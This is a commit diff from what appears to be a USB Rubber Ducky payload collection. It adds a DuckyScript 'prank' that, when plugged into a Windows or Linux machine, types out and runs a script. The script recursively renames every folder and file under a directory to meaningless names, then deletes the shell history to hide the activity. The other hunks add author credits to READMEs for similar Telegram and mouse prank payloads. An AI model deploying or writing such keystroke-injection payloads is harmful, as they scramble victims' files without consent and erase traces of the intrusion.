<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,222 @@
REM_BLOCK
#############################################
# #
# Title : Same File Name Prank #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11; GNU/Linux #
# #
#############################################
END_REM
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
REM %%%%% DEFINE-SECTION %%%%%
REM_BLOCK
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
Of course, you have to make sure that this folder exists....
Payload Settings:
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
Consider the maximum length of file names on both Windows and GNU/Linux:
- Limit on file name length in bash [closed]
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
END_REM
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
DEFINE #TARGET_WINDOWS TRUE
DEFINE #TARGET_GNU_LINUX FALSE
REM %%%%% PAYLOAD-SECTION %%%%%
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
REM %%%%% WINDOWS CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
function Rename-Directories {
param (
[string]$path,
[ref]$counter
)
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
foreach ($folder in $folders) {
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
$newFolderPath = $newFolderName
$counter.Value++
Rename-Item -Path $folder.FullName -NewName $newFolderPath
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
}
}
function Rename-Files {
param (
[string]$path,
[ref]$counter
)
$files = Get-ChildItem -Path $path -File -Recurse
foreach ($file in $files) {
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
$newFilePath = "$newFileName" + $file.Extension
$counter.Value++
Rename-Item -Path $file.FullName -NewName $newFilePath
}
}
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
REM %%%%% GNU/LINUX CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 1000
STRINGLN_BASH
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
rename_directories() {
local path=$1
local counter=$2
directories=$(find "$path" -type d | sort -r)
for dir in $directories; do
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
new_folder_path="$path/$new_folder_name"
counter=$((counter + 1))
mv "$dir" "$new_folder_path"
done
}
rename_files() {
local path=$1
local counter=$2
files=$(find "$path" -type f)
for file in $files; do
extension="${file##*.}"
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
new_file_path="$(dirname "$file")/$new_file_name"
if [[ "$extension" != "$file" ]]; then
new_file_path="$new_file_path.$extension"
fi
counter=$((counter + 1))
mv "$file" "$new_file_path"
done
}
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
END_STRINGLN
END_IF

View File

@ -22,3 +22,25 @@ Open a PowerShell, stop Teams if is runned, run Teams, run new message function,
### Settings ### Settings
- Setup the receiver - Setup the receiver
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -1,4 +1,4 @@
# Send Telegram Messages - Linux # Send Telegram Messages - Linux
A script used to prank your friends sending messages by using Telegram app. A script used to prank your friends sending messages by using Telegram app.
@ -17,11 +17,29 @@ Opens a shell, runs the telegram-desktop app, search the user by the id, enter i
* Internet Connection * Internet Connection
* telegram-desktop installed and activated * telegram-desktop installed and activated
### Executing program
* Plug in your device
### Settings ### Settings
- Telegram username - Telegram username
- Messages - Messages
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

View File

@ -19,3 +19,25 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t
### Settings ### Settings
- Setup your Python script link in the payload.txt file - Setup your Python script link in the payload.txt file
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>